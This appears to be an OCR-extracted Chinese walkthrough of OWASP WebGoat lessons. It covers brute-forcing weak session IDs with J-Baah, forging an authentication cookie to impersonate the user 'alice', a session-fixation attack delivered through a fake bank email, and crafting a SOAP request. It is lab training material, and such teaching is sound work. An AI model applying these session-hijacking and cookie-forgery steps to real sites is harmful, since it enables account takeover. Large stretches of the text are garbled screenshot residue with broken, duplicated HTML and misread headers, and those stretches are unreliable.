Request       Response         GET http://localhost.8080       Parameter 1         User-Agent Mozilla/5.0 (Windows NT 5.1; n/5.0) Gecko/20100101 Firef       Inner Loop         Accept-Language: en-us; en; q=0.5       Recept-Encoding: gzip; deflate         Accept-Charset: IS0-8859-1; ulf-8; q=0.7, *; q=0.7       To:         Proxy-Connection: keep-alive       File         Referer: http://localhost:8080/webgoat/attack?Screen=219&menu=180       File         Cookie: WEAKID=16965-1312.472:439##1##; USESSIONID=833812180       File:         Authorization: Basic Z3VIC3U6Z3VIC3Q=       Actions       Target         SCORE: PARAMETER 1: PARAMETER 2: CONTENT       Stop       Pause	
GET http://localhost.3080/webgoat/attack?Screen=218&menu=1800 H Host localhost.3080 User-Agent Mozilla/5.0 (Windows NT 5.1; r/:5.0) Gecko/20100101 Fire/c Accept-Language: en-us.en:q=0.5 Accept-Language: en-us.en:q=0.5 Accept-Encoding: gzlp. deflate Accept-Language: en-us.en:q=0.7 Proxy-Connection: keep-alive Referer: http://localhost.8080/webgoat/attack?Screen=219&menu=180 Cooke: VEAKID=1996-5132472433##1##_USESSIONID=833812180 Authorizabon: Basic 23VIC3Ub23VIC3UE= SCORE : PARAMETER 1 : PARAMETER 2 : CONTENT SCORE : PARAMETER 1 : PARAMETER 2 : CONTENT	eter 2
CORE : PARAMETER 1 : PARAMETER 2 : CONTENT	375 484
SCORE : PARAMETER 1 : PARAMETER 2 : CONTENT  Actions Target Fu Base Response Start Stop Pause	Browse
Base Response Start Stop Pause	uzzy Logic Content Extraction
Start Stop Pause	Threads: 3+
Stop	
Pause	

### J-Baah 设置

最后,回到右下方【Target】选项卡,设置 Host 和 Port 分别为 WebGoat 的主机地址和 端口,80 或 8080(视您的实际部署情况)。

回到【Action】选项卡,单击【Base Response】。您可以看到左下角中一个响应成功的消息。修改【Threads】为 2,点击【Start】开始。左下角将充满各种包含"Hijack a session"的消息内容。



🚯 SensePo	st J-Baah								- • ×
File Help									
Request	Response			1	Paramete	er 1 P	arameter 2		
GET http://loo Host localho User-Agent	alhost:8080/ st:8080 Mozilla/5.0 (W	webgoat/attack?s indows NT 5.1; n	3creen=218&mer r.5.0) Gecko/2010	nu=1800 H <sup>1</sup> 00101 Firef¢	Inner Loop	p eric			
Accept text/h	tml,applicatio	n/xhtml+xml,appl	ication/xml;q=0.9	8.0=p;*/*	From	٥ <u> </u>		375	
Accept-Lang Accept-Enco	ding: azio: def	n,q=0.5 late			To	c 🗌		484	
Accept-Char	set: ISO-8859	-1,utf-8;q=0.7,*;q=	=0.7		O File				
Proxy-Conne Referer: http	ction: keep-al //localhost:80	ive 180/webgoat/attar	ck?Screen=219&	menu=180	File:				
Authorization	Basic Z3VIc	906Z3VIc3Q=					Brow	/50	
A . T									
0.999909 : 4	17 : Hijack	a Session		-	Actions	Target	t Fuzzy Logic	Content Extraction	
0.99969 : 4	18 : : Hijack	a Session			Base Re	sponse		Threads:	2
0.99969 : 4	20 : : Hijack	a Session				a la constante de la constante			
0.99969 : 4	19 : : Hijack	a Session			Sta	art	44		
0.99969 : 43	21 : : Hijack	a Session			Sti				
0.99969 : 4:	22 : : Hijack	a Session							
0.99969 : 4:	23 : : Hijack	a Session			Pau	ise			
0.99969 : 4:	24 : : Hijack	a Session							
0.999969 : 4.	25 : Hijack	a Session							
0.00060 . 4	07 · · Hijack	a Session		- 2					
0.99969 : 4	28 : : Hijack	a Session							
0.9949 : 42	): : Hijack (	a Session							
0.99954 : 4	30 : : Hijack	a Session							
0.99954 : 4:	31 : : Hijack	a Session							
0.99954 : 43	33 : : Hijack	a Session							
0.99954 : 4:	32 : : Hijack	a Session							
0.99954 : 4:	34 : : Hijack	a Session							
0.99954 : 4 STOPPED 1	35 : Hilack ested #110 o	a Session							

一旦猜解成功,则该记录将被高亮显示。

在我们继续深入之前,理解这些操作的原理非常重要。##1##被我们指定在一定范围内的不同字符串所替代,并用于请求。从 16965-1312472439375 开始,到 16965-1312472439484 结束。J-Baah 收集了所有的响应结果,并在左下角的窗口给与显示。

每一行显示每个 SessionID 请求所触发的响应,并显示了与其相关的重要信息。

0.99969 : 417 : : Hijack a Session

Clicking base response 尝试了第一个 WEAKID,并设置其响应为 Control。第一个数 值表示后续的请求响应与第一个响应之间的**相似度**。如果该数值为 1,则表示完全相同。这 个数值与 1 差距越大,则其响应内容差距也越大!

0.99969 : 417 : : Hijack a Session

第二个数字是用于替换##1## 的数值。

0.99969 : 417 : : Hijack a Session

最后是响应页面的 HTML 标题。在该例中是"Hi jack a Session" (请求有错误发生时服务端给出的解释)。

基本请求响应的相似度值告诉我们对应的 WEAKID 的工作情况。如果一切顺利,那么该数值将只有三种。再次查看上面截图,有很多相似度为.99969 的响应,只有 1 个.9949 的相 似度,接下来是.99954。这些相似度一直保持相同,直到以 429 结尾的 WEAKDID 出现才改变。 这就是爆破成功的标识! 右键该响应内容,点击【Show Response】。



<divid="training_wrap> <divid="training_wrap> <divid="training_class="info"><a class="info" href="http://yehg.netilabipr0jsitraining/webgoat.php" target="_bia&lt;br&gt;&lt;divid=" training"=""><a class="info" href="http://yehg.netilabipr0jsitraining/webgoat.php" target="_bia&lt;br&gt;&lt;divid=" training"=""><a href="http://yehg.netilabipr0jsitraining/webgoat.php" target="_bia&lt;br&gt;&lt;divid=" training_class="info"><a href="http://yehg.netilabipr0jsitraining/webgoat.php" target="_bia&lt;br&gt;&lt;divid=" training_class="training"></a> </a></a></a></a></a></a></a></a></a></a></a></a></a></a></divid="training_class="info"></divid="training_wrap></divid="training_wrap>	🚣 View Results			
<dv dv?<br=""><dv id="lessonPians" lessoncontent"="" style="visibility:hidden; height tpx; position:absolute; left 260px; top:130px; v&lt;br&gt;/dv?&lt;br&gt;p&gt;&lt;b&gt;Concept / Topic To Teach;&lt;/b&gt;&lt;br&gt;Statinistructions ~&gt;&lt;br&gt;pplication developers who develop their own session IDs frequently forget to incorporate the complexity and randomness necessary for security. If the user specific&lt;br&gt;p&gt;&lt;b&gt;Concept / Topic To Teach;&lt;br&gt;polseneral Goal(s);&lt;br&gt;to access an authenticated session belonging to someone else.&lt;br&gt;Stop Instructions ~&gt;&lt;br&gt;ob/Feneral Goal(s);&lt;br&gt;y to access an authenticated session belonging to someone else.&lt;br&gt;Stop Instructions ~&gt;&lt;br&gt;ob/Feneral Goal(s);&lt;br&gt;y to access an authenticated session belonging to someone else.&lt;br&gt;Stop Instructions ~&gt;&lt;br&gt;ob/Feneral Goal(s);&lt;br&gt;y to access an authenticated session belonging to someone else.&lt;br&gt;Stop Instructions ~&gt;&lt;br&gt;ob/Feneral Goal(s);&lt;br&gt;y to access an authenticated session belonging to someone else.&lt;br&gt;Stop Instructions ~&gt;&lt;br&gt;ob/Feneral Goal(s);&lt;br&gt;y to access an authenticated session belonging to someone else.&lt;br&gt;(div id="> Application developers who develop their own session IDs frequently forget to incorporate the comp p&gt;<b>General Goal(s); (div id="lessonContent"&gt; Application developers who develop their own session IDs frequently forget to incorporate the comp odiv id="lessonContent"&gt; <div id="lessonContent"> <div id="lessonContent"> <!--</th--><th></th><th><div id="training_wrap"> <div class="info" id="training"><a class="info" href="http://yehg.net/iab/pr0js/training/webgoat.php" reset"="" target="_bian&lt;br&gt;&lt;div id="><a href="attack?Screen=218&amp;menu=1800&amp;Restart=218">Restart this i </a></a></div></div></th></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></b></dv></dv>		<div id="training_wrap"> <div class="info" id="training"><a class="info" href="http://yehg.net/iab/pr0js/training/webgoat.php" reset"="" target="_bian&lt;br&gt;&lt;div id="><a href="attack?Screen=218&amp;menu=1800&amp;Restart=218">Restart this i </a></a></div></div>		
-div id="lessonPlans" style="visibility/hidden; height tpx; position:absolute; left 260pc; top:130pc; visibility/hidden; height tpx; position:abs		/div> dirid="lessonArea">		
iditive         py-cb>Concept / Topic To Teach:           is Start Instructions>          upplication developers who develop their own session IDs frequently forget to incorporate the complexity and randomness necessary for security. If the user specific py-cb>Ceneral Goal(s):           y-cb>Ceneral Goal(s): <td>ip&gt;≺b&gt;Lesson Plan Title:≺/b&gt; How to Hijack a Se</td> <td><div 1";"plan="" cdiv:id="lessonContent" down";"group="" id="TessonPlans" javascripttoggle(tessonplans")"="" onclick="IMM_nbGroup(" style="visibility:hidden; height:1px; position:absolute; left:260px; top:130px; wi&lt;br&gt;ssion=/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;pplication develops who develop their own session IDs frequently forget to incorporate the complexity and randomness necessary for security. If the user specif&lt;br&gt;p&gt;-b&gt;General Goal(s) &lt;br/&gt; &lt;br/&gt;&lt;/td&gt;&lt;td&gt;/div&gt;&lt;br&gt;p&gt;&lt;b&gt;Concept / Topic To Teach:&lt;/b&gt;&lt;br&gt;I– Start instructions&gt;&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;/td&gt;&lt;td&gt;pplication developers who develop their own set&lt;br&gt;p&gt;-b&gt;General Goal(s):-(b&gt;-(p&gt;&lt;br&gt;iy to access an authenticated session belonging&lt;br&gt;I—Stop instructions&gt;&lt;/td&gt;&lt;td&gt;ssion IDs frequently forget to incorporate the complexity and randomness necessary for security. If the user specific&lt;br&gt;to someone else.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;cbr/&gt; cbr/&gt; cbr/&gt; ca href=" target="_top"> Application developers who develop their own session IDs frequently forget to incorporate the com p&gt;<b>General Goal(s): cb&gt; cp&gt; constant of the importance of the im</b></div></td> <td></td> <td> bt/&gt;</td>	ip>≺b>Lesson Plan Title:≺/b> How to Hijack a Se	<div 1";"plan="" cdiv:id="lessonContent" down";"group="" id="TessonPlans" javascripttoggle(tessonplans")"="" onclick="IMM_nbGroup(" style="visibility:hidden; height:1px; position:absolute; left:260px; top:130px; wi&lt;br&gt;ssion=/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;pplication develops who develop their own session IDs frequently forget to incorporate the complexity and randomness necessary for security. If the user specif&lt;br&gt;p&gt;-b&gt;General Goal(s) &lt;br/&gt; &lt;br/&gt;&lt;/td&gt;&lt;td&gt;/div&gt;&lt;br&gt;p&gt;&lt;b&gt;Concept / Topic To Teach:&lt;/b&gt;&lt;br&gt;I– Start instructions&gt;&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;/td&gt;&lt;td&gt;pplication developers who develop their own set&lt;br&gt;p&gt;-b&gt;General Goal(s):-(b&gt;-(p&gt;&lt;br&gt;iy to access an authenticated session belonging&lt;br&gt;I—Stop instructions&gt;&lt;/td&gt;&lt;td&gt;ssion IDs frequently forget to incorporate the complexity and randomness necessary for security. If the user specific&lt;br&gt;to someone else.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;cbr/&gt; cbr/&gt; cbr/&gt; ca href=" target="_top"> Application developers who develop their own session IDs frequently forget to incorporate the com p&gt;<b>General Goal(s): cb&gt; cp&gt; constant of the importance of the im</b></div>		 bt/>
Application developers who develop their own session IDs frequently forget to incorporate the com p> <b>General Goal(s):</b> Ty to access an authenticated session belonging to someone else. <div class="info" id="message">&lt;8R&gt; * Congratulations. You have successfully completed this le <div class="info" id="message">&lt;8R&gt; * Congratulations. You have successfully completed this le <div class="info" id="message">&lt;8R&gt; * Congratulations. You have successfully completed this le <div class="info" id="message">&lt;6Iv id="message" class="info"&gt;&lt;6R&gt; * Congratulations. You have successfully completed this le <div class="info" id="message">&lt;6Iv id="message" class="info"&gt;&lt;6Iv id="message" class="info"&gt;</div></div></div></div></div>		<pre> dp/&gt;</pre> <pre><ah lessoncontent"="" ondlick="\MM_nbGroup('down';'group1';'plan: &lt;dh/&gt;&lt;dh/&gt; &lt;dh/&gt;&lt;dh/&gt;&lt;/pre&gt; &lt;divid=" pticsingle(lessonplans)*target="_top"></ah></pre>		
ny to access an authenticated session belonging to someone else. /dt/> <li></li> <li><td>p&gt;<b>General Goal(s) </b></td><td>Application developers who develop their own session IDs frequently forget to incorporate the comp</td></li>	p> <b>General Goal(s) </b>	Application developers who develop their own session IDs frequently forget to incorporate the comp		
<div class="info" id="message">&lt;8R&gt; * Congratulations. You have successfully completed this le <div id="lessonContent"><form accept-charset="UNKNOWN*" action="*attack?Screen=;&lt;/p" method="POST*" name="form*"> <div id="credits"> <div id="credits"> <div id="credits"> <div id="accepth"></div></div></div></div></form></div></div>	ry to access an authenticated session belonging	to someone else.		
<div id="lessonContent"><form accept-charset="UNKNOWN" action="attack?Screen=;&lt;br&gt;&lt;div id=" credits"="" method="POST" name="form"> valign="AliDDL"</form></div>		div id="message" class="info"> * Congratulations. You have successfully completed this les		
<divid="credits"> valign="MIDDL"</divid="credits">		dv id="lessonContent"><form accept-charset='UNKNOWN' method='POST' name=form' action='attack?Screen=2</td>		
		<div id="credits"> <td <="" td="" valign="MIDDLE"></td></div>		
<td></td> <td></td>				
	~/di/v=			
<pre><divid="bottom"></divid="bottom"></pre>	<div id="bottom"></div>	riu olinn="ranter"⊾ <a "="" hraf-"http:="" www.awson.av="">∩WJSP Enundstany/as I</a>		

暴力破解成功,刷新课程页面通过本节课程。

# 2.17.2认证 Cookie 欺骗(Spoof an Authentication Cookie)

### 2.17.2.1 技术概念或主题(Concept / Topic To Teach)

如果验证 cookie 正确,一些应用程序会允许一个用户自动登录到他们的网站。如果能够获得生成 cookie 的算法,有时 cookie 的值是可以猜到的。有时候 cookie 可能是通过跨站 攻击截获的。在这一课中,我们的目的是了解身份验证 cookie 的方式,并指导您学习突破 这种身份验证 cookie 的方法

### 2.17.2.2 技术原理(How It works)

Cookie 存储在客户端,可随时被篡改用于特别用途。



## 2.17.2.3 总体目标(General Goals)

本节课程的目标是绕过认证检查。

Solution Videos

Restart this Lesson

perts

The user should be able to bypass the authentication check. Login using the webgoat/webgoat account to see what happens. You may also try aspect/aspect. When you understand the authentication cookie, try changing your identity to alice.

_				
5	П	а	n	n
-		ч		

Please sign in to your account. See the OWASP admin if you do not have an account.

*Required	Fields
-----------	--------

ASPECT SECURITY

### 2.17.2.4 操作方法(Solutions)

请确认在 WebGoat 中开启了"Show Cookies"功能。您需要在 WebScarab 中禁用"Inject know cookies into requests", 否则 WebScarab 将会一直截获您的旧的 cookie, 而不是新 的截获。



以webgoat/webgoat 登录



Solution VideosHint: The server authenticates the user using a Restart this Lesson cookie, if you send the right cookie.

### JSESSIONID 🔿 25CCC14DCECF777F4F96873E1C50EC7A

Login using the webgoat/webgoat account to see what happens. You may also try aspect/aspect. When you understand the authentication cookie, try changing your identity to alice.

### \* Your identity has been remembered

Welcome, webgoat

You have been authenticated with PARAMETERS

Logout

<u>Refresh</u>



OWASP Foundation | Project WebGoat | Report Bug

点击"Refresh",这会刷新显示我们的AuthCookie。

Solution VideosHint: The server authenticates the user using a Restart this Lesson cookie, if you send the right cookie.

#### AuthCookie 🕸 65432ubphcfx

#### JSESSIONID 🕏 25CCC14DCECF777F4F96873E1C50EC7A

Login using the webgoat/webgoat account to see what happens. You may also try aspect/aspect. When you understand the authentication cookie, try changing your identity to alice.

Welcome, webgoat

You have been authenticated with COOKIE

Logout

<u>Refresh</u>



OWASP Foundation | Project WebGoat | Report Bug

您现在使用的身份验证是这个 cookie,而不是像上面的参数验证。您会得到 "AuthCookie" cookie,值为 65432ubphcfx。然后退出登录,以"aspect\aspect"登录。 点击"Refresh",显示新的"AuthCookie"。现在您有一个新的值。



Solution VideosHint: The server authenticates the user using a Restart this Lesson cookie, if you send the right cookie.

### AuthCookie 🗣 65432udfqtb

### JSESSIONID © 25CCC14DCECF777F4F96873E1C50EC7A

Login using the webgoat/webgoat account to see what happens. You may also try aspect/aspect. When you understand the authentication cookie, try changing your identity to alice.

Welcome, aspect

You have been authenticated with COOKIE

Logout

<u>Refresh</u>

这是一个英文字母的换位。每个字母都是用户名倒过来,并被替换为它后面的,如 T->U,A->B。因此如果以用户"alice"登录,cookie 会将用户名倒转为"ecila",然后每 个字母向后一位,最终结果为"fdjmb"

以用户名 alice 登录,通过 WebScarab 截获请求。在已经存在的 JSESSIONID 后面添加 ";AuthCookie=65432fdjmb"

👙 Edit Request				_ 🗆 🔀
Inte	ercept requests : [	Intercept responsion	ses : 📃	
Parsed Raw				
Method URL				Version
POST http://neo:80/WebGoa	t/attack?menu=310	)		HTTP/1.1
Header		Value	9	
Content-Type	app	lication/x-www-form-u	rlencoded	<b>▲</b>
UA-CPU	x86			
Accept-Encoding	gzip	), deflate		
User-Agent	Moz	illa/4.0 (compatible; M	SIE 7.0; Windows	Insert
Proxy-Connection	Kee	p-Alive		
Content-length	37			Delete
Host	neo			
Pragma no-cache				
Cookie		<u>3634B094B36D; Auth</u>	<u>Cookie=65432fdjmb</u>	
Authorization Basic Z3VIc3Q6Z3VIc3Q=		<b>-</b>		
DIALENCOUCU TEAL NEA				
Variable		Val	ue	
Username	ali	ce		Insert
Password		ain		Delete
50BIMIT	LU	giri		Delete
Accept changes (	Cancel changes	Abort request	Cancel ALL inte	ercepts
结果是没有输入密码,即	」 可以 alice 进行	登录了。		



Solution VideosLogin using the webgoat/webgoat account to see what Restart this Lesson happens. You may also try aspect/aspect. When you understand the authentication cookie, try changing your identity to alice.

#### \* Congratulations. You have successfully completed this lesson.

#### Welcome, alice

You have been authenticated with COOKIE

Logout

Refresh



OWASP Foundation | Project WebGoat | Report Bug

## 2.17.3会话固定(Session Fixation)

### 2.17.3.1 技术概念或主题(Concept / Topic To Teach)

通过会话固定盗取 Session。

### 2.17.3.2 技术原理(How It works)

服务器通过每个用户的唯一的 Session ID 来确认其合法性。如果用户已登录,并且授权 他不必重新验证授权时,当他重新登录应用系统时,他的 Session ID 依然是被认为合法的。 在一些程序中,可能会在 GET-REQUEST 请求中传递 Session ID。这就是攻击的起点。

一个攻击者可以用一个选定的 Session ID 给受害人发送一个超链接。例如,这里有一个 准备好的邮件,它看起来像是一个从应用程序管理员发来的官方邮件。如果受害者点击了这 个链接,并且该受害者以攻击者指定的 ID 登录了系统;那么攻击者可以不经授权直接使用 与受害者相同的 ID 访问该页面。

### 2.17.3.3 总体目标(General Goals)

本节课程有多个步骤,您需要同时扮演攻击者和受害者两个角色。完成该课程后,您将理解会话固定的原理;同时也将理解使用 GET 请求传递 Session ID 是个很糟糕的主意!



## 2.17.3.4 操作方法(Solutions)

第一步:给 Jane 发送一封邮件,这个邮件看起来像是 Goat Hills Financial 发来的包含 一个 Session ID 的链接。邮件已经准备好了,您只需要在连接中加入一个 Session ID。您可 以通过向链接中加入&SID=WHATEVER.当然 WHATEVER 可以用其他字符代替。这个链接 可以是这样:

<a href=http://localhost:8080/WebGoat/attack?Screen=46&menu=320&SID=WHATEVER>

Solution VideosSTAGE 1: You are Hacker Joe and you want to steal the session from Jane. Send a prepared email to the Restart this Lesson victim which looks like an official email from the bank. A template message is prepared below, you will need to add a Session ID (SID) in the link inside the email. Alter the link to include a SID. You are: Hacker Joe Mail To: jane.plane@owasp.org Mail From: admin@webgoatfinancial.com Title: Check your account <b>Dear MS. Plane</b> <br><br>During the last week we had a few problems with our database. We have received many complaints regarding incorrect account details. Please use the following link Ξ to verify your account data:<br><br><center><a href=http://localhost/WebGoat/attack? Screen=16&menu=1700&SID=WHATEVER> Goat Hills Financial</a>/center><br>>We are sorry for the any inconvenience and thank you for your cooparation.<br><br><br>Your Send Mail Created by: Reto Lippuner, Marcel Wirth

点击确定后提交,第一步完成。

Solution VideosSTAGE 2: Now you are the victim Jane who received Restart this Lesson the email below. If you point on the link with your

mouse you will see that there is a SID included. Click on it to see what happens.

#### You are: Victim Jane

\* You completed stage 1!

Mail From: admin@webgoatfinancial.com

#### Dear MS. Plane

During the last week we had a few problems with our database. We have received many complaints regarding incorrect account details. Please use the following link to verify your account data:

Goat Hills Financial

We are sorry for the any inconvenience and thank you for your cooparation.

#### Your Goat Hills Financial Team

第二步:现在您是第一步中的收件人 Jane。这一步很简单,您只需要点击"Goat Hills Financial"。



Mail From: admin@webgoatfinancial.com

#### Dear MS. Plane

During the last week we had a few problems with our database. A lot of people complained that there account details are wrong. That is why we kindly ask you to use following link to verify your data:

Goat Hills Financial

We are sorry for the caused inconvenience and thank you for your colaboration.

#### Your Goat Hills Financial Team



第三步: 您已经到了"Goat Hills Financial"的登录界面。以 Jane/tarzan 登录。 Solution VideosSTAGE 3: The bank has asked you to verfy your data. Restart this Lesson Log in to see if your details are correct. Your user name is Jane and your password is tarzan.

You are: Victim Jane

#### \* You completed stage 2!

a se	Goat Hills Financial Human Resources
( min	٢
	Please Login
	Enter your name: Jane
	Login



Solution VideosSTAGE 4: It is time to steal the session now. Use following link to reach Goat Hills Financial.

**Restart this Lesson** 

### You are: Hacker Joe

### \* You completed stage 3!

Jane has logged into her account. Go and grab her session! Use Following link to reach the login screen of the bank:

Goat Hills Financial

Created by: Reto Lippuner, Marcel Wirth

OWASP Foundation | Project WebGoat | Report Bug

第四步:现在您是黑客 Joe。已经有一个准备好的链接,单击后登录到"Goat Hills Financial"页面,当然在现实中,这会有些不同。登录后您会在浏览器中看到您的 SID 是 "NOVALIDSESSION",将这个 ID 改成"WHATEVER",然后回车。

Session Fixation - Windows Internet	t Explorer	the state of the s	- 0 - X
🕒 🕞 🗢 🙋 http://localhost:8080	/WebGoat/attack?Screen=16&menu=1700&SID=WHATEVER	🔹 🗟 🔶 🗙 🕒 Bing	- م
🚖 收藏夫 🛛 🙀 🔊 招商銀行 信用+	#电子账		
88 - 😭 百度搜索 周通快递网点查询	爱 X3型光路内部网 !     爱 Session Fixation ×	🛅 <b>- </b> - 🗔 🖶 - Jac	• 安全(5) • 工具(0) • 😧 • "
	Logout 🕜		
200	T, TALABELIN		
3 Mirst	Session Fixation		
OWASP WebGoat V5.2	Hints > Show Params Show Cookles Lesson Plan Show Java Solution		
Introduction General	Solution VideosSTAGE 4: It is time to steal the session now. Use Restart this Lesson following link to reach Goat Hills Financial.		
Addess Control Haws AddX Security Authentication Flaws	You are: Hacker Joe		
Buffer Overflows Code Quality Concurrency	(		
Cross-Site Scripting (XSS) Denial of Service	Goat Hills Financial		
Injection Flaws Insecure Communication	in .		
Insecure Configuration Insecure Storage Parameter Tampering	<u> </u>		
Session Management Flaws Hijack a Session	Please Login		
Spoof an Authentication Conkie	Enter your name:		
Service Fination	Enter your password:		
Admin Functions Challenge	Login		
	Created by: Reto Lippuner, Marcel		
	wirth		



**Restart this Lesson** 

Solution VideosSTAGE 4: It is time to steal the session now. Use following link to reach Goat Hills Financial.

#### You are: Hacker Joe

\* Congratulations. You have successfully completed this lesson.

EV.	Goat Hills Finan Human Resources	cial	
( min			J
	Firstname:	Jane	
	Lastname:	Plane	
	Credit Card Type:	MC	
	Credit Card Number:	74589864	
			Logout
			)

成功访问后,通过本课程。

## 2.18 Web 服务(Web Services)

# 2.18.1创建 SOAP 请求(Create a SOAP Request)

### 2.18.1.1 技术概念或主题(Concept / Topic To Teach)

Web Services 通过使用 SOAP 请求进行通信。这个请求提交到一个尝试执行一个 Web 服务描述语言(WSDL)定义的函数的 Web 服务。让我们一起来学习一些关于 WSDL 的文件。 查看一下 WebGoat 的 WSDL 文件。



## 2.18.1.2 技术原理(How It works)

SOAP 通讯过程中,HTTP Content 部分一般是 XML 内容。

## 2.18.1.3 总体目标(General Goals)

尝试用浏览器或者 WebService 工具连接 WSDL。WebService 的 URL 地址是:

http://localhost:8080/WebGoat/services/SoapRequest	
WSDL 通常可被视为在 web 服务请求结束处加入一/	个 WSDL。点击页面上的"WebGoat
WSDL",或者在上面的请求后面加上"?WSDL"即可。	
http://localhost:8080/WebGoat/services/SoapRequest?WSDL	
发起两种以上的 SOAP 操作请求以完成本节课程。	

## 2.18.1.4 操作方法(Solutions)

第一步,我们要得到在 WSDL 中定义了几个操作。访问"WebGoat WSDL"的 URL 查看 Webservices 描述定义语言文件。



进入 WSDL 文件页面,可以看到一共有四个。在页面中输入 4,进入下一步。

- OWASP 中国
   The Open Web Application Security Project
  - <wsdl:portType name="SoapRequest">
    - <wsdl:operation name="getFirstName" parameterOrder="id">

<wsdl:input message="impl:getFirstNameRequest" name="getFirstNameRequest" />
<wsdl:output message="impl:getFirstNameResponse" name="getFirstNameResponse" />
</wsdl:operation>

- <wsdl:operation name="getLastName" parameterOrder="id"> <wsdl:input message="impl:getLastNameRequest" />
  - <wsdl:output message="impl:getLastNameResponse" name="getLastNameResponse" />
    </wsdl:operation>
- <wsdl:operation name="getCreditCard" parameterOrder="id">
- <wsdl:input message="impl:getCreditCardRequest" name="getCreditCardRequest" />
  <wsdl:output message="impl:getCreditCardResponse" name="getCreditCardResponse" />
  </wsdl:operation>
- <wsdl:operation name="getLoginCount" parameterOrder="id">
- <wsdl:input message="impl:getLoginCountRequest" name="getLoginCountRequest" />
  <wsdl:output message="impl:getLoginCountResponse" name="getLoginCountResponse" />
  </wsdl:operation>

</wsdl:portType>

现在我们需要回答的问题是在"getFirstNameRequest"中"id"的类型是什么。

Solution VideosWeb Services communicate through the use of SOAP Restart this Lesson requests. These requests are submitted to a web

service in an attempt to execute a function defined in the web service definition language (WSDL). Let's learn something about WSDL files. Check out WebGoat's web service description language (WSDL) file.

#### General Goal(s):

Try connecting to the WSDL with a browser or Web Service tool. The URL for the web service is: http://localhost/WebGoat/services/SoapRequest The WSDL can usually be viewed by adding a ?WSDL on the end of the web service request.

#### \* Stage 1 completed.

Now, what is the type of the (id) parameter in the "getFirstNameRequest" method:

View the following WSDL and count available operations:  $\ensuremath{\mathsf{WebGoat}}$  WSDL File

OWASP Foundation | Project WebGoat | Report Bug

从图中可以看到,答案是"int"。输入后进入第三步。

完成第二步



Solution VideosWeb Services communicate through the use of SOAP requests. These requests are submitted to a web Restart this Lesson service in an attempt to execute a function defined in the web service definition language

(WSDL). Let's learn something about WSDL files. Check out WebGoat's web service description language (WSDL) file.

#### General Goal(s):

Try connecting to the WSDL with a browser or Web Service tool. The URL for the web service is: http://localhost/WebGoat/services/SoapRequest The WSDL can usually be viewed by adding a ?WSDL on the end of the web service request.

#### \* Stage 2 completed.

Intercept the request and invoke any method by sending a valid SOAP request for a valid account.

Press to generate an HTTP request

WebGoat WSDL File

OWASP Foundation | Project WebGoat | Report Bug

截取请求并调用任何方法,发送一个有效 SOAP (简单对象访问协议)请求的有效的账 户。

启动 WebScarab,确保"Intercept requests""Intercept responses"被选中

POST 改为: POST http://localhost:8080/WebGoat/services/SoapRequest HTTP/1.1

Content-Type 改为 text/xml

修改 HTTP Content 代码,最后格式如下:

POST http://webgoatvm/WebGoat/services/SoapRequest HTTP/1.1

Host: webgoatvm

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8

Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Proxy-Connection: keep-alive

Referer: http://webgoatvm/WebGoat/attack?Screen=171&menu=1900

Cookie: JSESSIONID=095FE3EEE0BBFA63E32D2D961F19911A

Authorization: Basic Z3VIc3Q6Z3VIc3Q=

Content-Type: text/xml

**SOAPAction:** 

Content-length: 40

<?xml version="1.0" encoding="UTF-8"?>

<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"

xmlns:xsd="http://www.w3.org/2001/XMLSchema"

xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">

<SOAP-ENV:Body>

<ns1:getFirstName SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"

xmlns:ns1="http://lessons">

<id xsi:type="xsd:int">101</id>

</ns1:getFirstName>

</SOAP-ENV:Body>

</SOAP-ENV:Envelope>



从 SOAPAction 头到打开的 XML 标记之间不能有空格,这一点非常重要,否则会引发一个错误信息。

🚣 Edit Re	quest					×
			Intercept requests :	Intercept response	ses : 💌	
Parsed	Raw					
Poist local POST http:// POST http:// Post http:// Accept.te.nd Accept-Enc Accept-Enc Accept-Enc Accept-Enc Accept-Char Prox-Conter-157 Content-167 SOAP-Action SOAP-Action SOAP-Action SOAP-Action SOAP-EN mins.xsi= <soap-e1< td=""><td>Norahost: 4 Mocalhost: 4 Mocalhost: 4 Mocalhost: 4 Mocalhost: 8 Mocalhost: 8 Mocalh</td><td>080/webgoat/services/Soa (Windows NT 5.1; rv:5.0) G ation/html+xml,application is, en; q=0.5 deflate 159-1,ufl-8; q=0.7, *; q=0.7 p=31ke 16808/webgoat/attack/25cn DFE689CCBCD03EC7E10 VIc3Q6Z3VIc3Q= herate+an+HTTP+request coding="UTF-8"?&gt; wmlns:SOAP-ENV="http://sc w3.org/2001/xMLSchema=ir v3.org/2001/xMLSchema=ir</td><td>pRequest HTTP/1.1 eckor20100101 Firefox xml;q=0.9,*/*,q=0.8 sen=40&amp;menu=1900 &amp;137ED674F9E5 hemas.xmlsoap.org/se hemas.xmlsoap.org/se</td><td>v5.0 pap/envelope#</td><td></td><td></td></soap-e1<>	Norahost: 4 Mocalhost: 4 Mocalhost: 4 Mocalhost: 4 Mocalhost: 8 Mocalhost: 8 Mocalh	080/webgoat/services/Soa (Windows NT 5.1; rv:5.0) G ation/html+xml,application is, en; q=0.5 deflate 159-1,ufl-8; q=0.7, *; q=0.7 p=31ke 16808/webgoat/attack/25cn DFE689CCBCD03EC7E10 VIc3Q6Z3VIc3Q= herate+an+HTTP+request coding="UTF-8"?> wmlns:SOAP-ENV="http://sc w3.org/2001/xMLSchema=ir v3.org/2001/xMLSchema=ir	pRequest HTTP/1.1 eckor20100101 Firefox xml;q=0.9,*/*,q=0.8 sen=40&menu=1900 &137ED674F9E5 